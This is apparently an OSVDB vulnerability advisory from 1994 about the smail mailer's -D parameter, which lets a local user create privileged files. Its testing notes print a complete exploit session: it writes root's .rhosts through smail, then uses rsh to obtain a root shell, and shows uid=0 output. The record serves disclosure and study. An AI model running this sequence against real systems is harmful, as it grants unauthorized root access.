smail -D Parameter Arbitrary Privileged File Creation

1994-10-06T03:27:11
ID OSVDB:17056
Type osvdb
Reporter OSVDB
Modified 1994-10-06T03:27:11

Description

Manual Testing Notes

    $ cat > ~/.forward
    localhost user
    ^D
    $ smail -bs -D ~root/.rhosts -v20
    220 [victim] Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT
    expn user
    250 user
    quit
    221 [victim] closing connection
    $ rsh -l root localhost tcsh -i
    Warning: no access to tty (Bad file number).
    Thus no job control in this shell.
    id
    uid=0(root) gid=0(root)

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1994_4/0060.html

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/1994_4/0103.html